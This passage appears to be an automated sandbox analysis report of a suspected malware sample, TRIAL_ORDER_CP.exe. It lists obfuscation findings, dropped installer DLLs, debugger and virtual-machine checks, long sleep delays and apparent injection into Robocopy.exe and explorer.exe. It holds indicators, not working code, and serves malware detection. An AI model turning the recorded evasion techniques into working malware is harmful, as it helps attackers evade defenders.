        Source: Binary string: mshtml.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000000.00000002.270766627678.0000000004C73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 0_2_70681BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 0_2_706830C0 push eax; ret 0_2_706830EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_33B108CD push ecx; mov dword ptr [esp], ecx 3_2_33B108D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_338063E2 push ebx; iretd 3_2_33806409
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_338002F3 push ds; ret 3_2_338002F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_3380C225 push ebp; ret 3_2_3380C1F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_3380BA36 push esi; ret 3_2_3380BA45
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_3380C1CA push ebp; ret 3_2_3380C1F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_338058D9 push D494064Eh; iretd 3_2_338058DE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_33804870 push edi; retf 3_2_33804871
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_3380FECC push ebp; retf 3_2_3380FECD
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_33803DB4 pushad ; ret 3_2_33803E61
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Code function: 3_2_338074DB push eax; retf 3_2_338074F7
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_047425F8 pushad ; ret 5_2_0474269F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_04744C20 push ebx; iretd 5_2_04744C47
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_047430AE push edi; retf 5_2_047430AF
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_04744117 push D494064Eh; iretd 5_2_0474411C
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_04745D19 push eax; retf 5_2_04745D35
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_047425F2 pushad ; ret 5_2_0474269F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_0474A274 push esi; ret 5_2_0474A283
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_0474AA63 push ebp; ret 5_2_0474AA34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_0474AA08 push ebp; ret 5_2_0474AA34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_0473EB31 push ds; ret 5_2_0473EB34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 5_2_0474E70A push ebp; retf 5_2_0474E70B
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_045608CD push ecx; mov dword ptr [esp], ecx 6_2_045608D6
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_048874DB push eax; retf 6_2_048874F7
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_04883DB4 pushad ; ret 6_2_04883E61
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_0488FECC push ebp; retf 6_2_0488FECD
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_048858D9 push D494064Eh; iretd 6_2_048858DE
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_04884870 push edi; retf 6_2_04884871
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_0488C1CA push ebp; ret 6_2_0488C1F6
        Source: C:\Windows\SysWOW64\Robocopy.exe Code function: 6_2_048802F3 push ds; ret 6_2_048802F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe File created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\Robocopy.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 51EB40B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 1DBB40B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D30594
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2FF74
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D6C4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D864
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D004
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D144
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D30594
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D764
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D324
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D364
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D004
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2FF74
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D6C4
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D864
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 rdtsc 3_2_33B51763
        Source: C:\Windows\SysWOW64\Robocopy.exe | Window / User API: threadDelayed 9852
        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 887
        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 871
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | API coverage: 0.4 %
        Source: C:\Windows\SysWOW64\Robocopy.exe | API coverage: 1.1 %
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716 | Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716 | Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716 | Thread sleep count: 9852 > 30
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716 | Thread sleep time: -19704000s >= -30000s
        Source: C:\Windows\SysWOW64\Robocopy.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\Robocopy.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C60
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 0_2_004068B1 FindFirstFileW,FindClose, 0_2_004068B1
        Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\keyboard.inf_loc
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270873238826.0000000003824000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270873405558.0000000003824000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D32F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D2CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Robocopy.exe, 00000006.00000002.272501983227.00000000027A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | API call chain: ExitProcess graph end node graph_0-2582
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | API call chain: ExitProcess graph end node graph_0-2807
        Source: C:\Windows\SysWOW64\Robocopy.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\Robocopy.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\Robocopy.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B51763 rdtsc 3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B534E0 NtCreateMutant,LdrInitializeThunk, 3_2_33B534E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 0_2_70681BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_70681BFF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8C3B0 mov eax, dword ptr fs:[00000030h] 3_2_33B8C3B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B193A6 mov eax, dword ptr fs:[00000030h] 3_2_33B193A6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B193A6 mov eax, dword ptr fs:[00000030h] 3_2_33B193A6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h] 3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h] 3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h] 3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h] 3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h] 3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h] 3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h] 3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h] 3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h] 3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF38A mov eax, dword ptr fs:[00000030h] 3_2_33BCF38A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B433D0 mov eax, dword ptr fs:[00000030h] 3_2_33B433D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B443D0 mov ecx, dword ptr fs:[00000030h] 3_2_33B443D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B943D5 mov eax, dword ptr fs:[00000030h] 3_2_33B943D5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h] 3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h] 3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h] 3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0C3C7 mov eax, dword ptr fs:[00000030h] 3_2_33B0C3C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B163CB mov eax, dword ptr fs:[00000030h] 3_2_33B163CB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BE3336 mov eax, dword ptr fs:[00000030h] 3_2_33BE3336
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h] 3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h] 3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h] 3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h] 3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h] 3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h] 3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3332D mov eax, dword ptr fs:[00000030h] 3_2_33B3332D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h] 3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h] 3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h] 3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4631F mov eax, dword ptr fs:[00000030h] 3_2_33B4631F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B09303 mov eax, dword ptr fs:[00000030h] 3_2_33B09303
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B09303 mov eax, dword ptr fs:[00000030h] 3_2_33B09303
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h] 3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h] 3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h] 3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h] 3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF30A mov eax, dword ptr fs:[00000030h] 3_2_33BCF30A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B90371 mov eax, dword ptr fs:[00000030h] 3_2_33B90371
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B90371 mov eax, dword ptr fs:[00000030h] 3_2_33B90371
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B3237A mov eax, dword ptr fs:[00000030h] 3_2_33B3237A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h] 3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h] 3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h] 3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h] 3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h] 3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h] 3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A350 mov eax, dword ptr fs:[00000030h] 3_2_33B4A350
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h] 3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h] 3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h] 3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0C2B0 mov ecx, dword ptr fs:[00000030h] 3_2_33B0C2B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h] 3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h] 3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h] 3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h] 3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF2AE mov eax, dword ptr fs:[00000030h] 3_2_33BCF2AE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BD92AB mov eax, dword ptr fs:[00000030h] 3_2_33BD92AB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B342AF mov eax, dword ptr fs:[00000030h] 3_2_33B342AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B342AF mov eax, dword ptr fs:[00000030h] 3_2_33B342AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B092AF mov eax, dword ptr fs:[00000030h] 3_2_33B092AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h] 3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h] 3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h] 3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B8E289 mov eax, dword ptr fs:[00000030h] 3_2_33B8E289
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h] 3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B072E0 mov eax, dword ptr fs:[00000030h] 3_2_33B072E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h] 3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h] 3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h] 3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h] 3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B182E0 mov eax, dword ptr fs:[00000030h] 3_2_33B182E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0D2EC mov eax, dword ptr fs:[00000030h] 3_2_33B0D2EC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0D2EC mov eax, dword ptr fs:[00000030h] 3_2_33B0D2EC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B432C0 mov eax, dword ptr fs:[00000030h] 3_2_33B432C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B432C0 mov eax, dword ptr fs:[00000030h] 3_2_33B432C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B332C5 mov eax, dword ptr fs:[00000030h] 3_2_33B332C5
